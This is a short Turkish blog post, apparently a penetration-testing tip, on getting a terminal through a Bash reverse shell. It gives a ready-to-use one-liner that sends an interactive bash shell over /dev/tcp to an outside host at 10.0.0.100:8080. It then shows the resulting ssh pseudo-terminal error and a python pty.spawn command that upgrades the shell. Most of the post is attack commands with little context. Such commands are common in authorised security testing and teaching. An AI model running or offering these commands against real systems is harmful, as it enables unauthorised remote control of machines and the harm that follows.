25 Kasım 2015 Çarşamba

Bash Reverse Shell ile Terminal Almak

Bash ile reverse shell almak için aşağıdaki komut kulanılabilir. Bu komut 10.0.0.100 IP adresinin 8080 portuna bağlantı sağlayacak ve bash kabuğunun kullanılmasına izin verecektir.

/bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.100/8080 0>&1' > /dev/null

Elde edilen bu komut satırı gerçek bir terminal gibi davranmadığından interafktif işlemlerde aşağıdaki gibi "Pseudo-terminal will not be allocated because stdin is not a terminal." hatası verecekir.

gondor ~ # ssh root@192.168.100.100
ssh root@192.168.100.100
Pseudo-terminal will not be allocated because stdin is not a terminal.

Bu durumda python pty.spawn ile gerçek bir terminal başlatmayı deneyebiliriz. Bunun için aşağıdaki gibi bir komut vermek yeterli olacaktır.

/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'


Hiç yorum yok:

Yorum Gönder